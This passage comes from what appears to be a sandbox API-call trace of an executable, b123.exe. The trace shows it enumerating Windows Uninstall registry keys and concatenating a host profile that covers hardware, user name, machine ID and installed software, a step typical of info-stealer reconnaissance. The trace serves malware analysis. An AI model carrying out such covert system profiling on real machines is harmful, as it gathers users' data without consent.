States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 " [0235.129] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 ", lpString2="12.0.30501.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0" [0235.129] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n" [0235.129] RegCloseKey (hKey=0x384) returned 0x0 [0235.129] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x19, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.129] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 90 [0235.129] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.129] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x197fac*=0x43) returned 0x0 [0235.129] lstrlenA (lpString="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508") returned 66 [0235.130] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n", lpString2="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508" [0235.130] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="14.25.28508.3", lpcbData=0x197fac*=0xe) returned 0x0 [0235.130] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 " [0235.130] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 ", lpString2="14.25.28508.3" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3" [0235.130] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n" [0235.130] RegCloseKey (hKey=0x384) returned 0x0 [0235.130] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x1a, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.130] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned 90 [0235.130] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.130] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x197fac*=0x43) returned 0x0 [0235.131] lstrlenA (lpString="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508") returned 66 [0235.131] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n", lpString2="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: 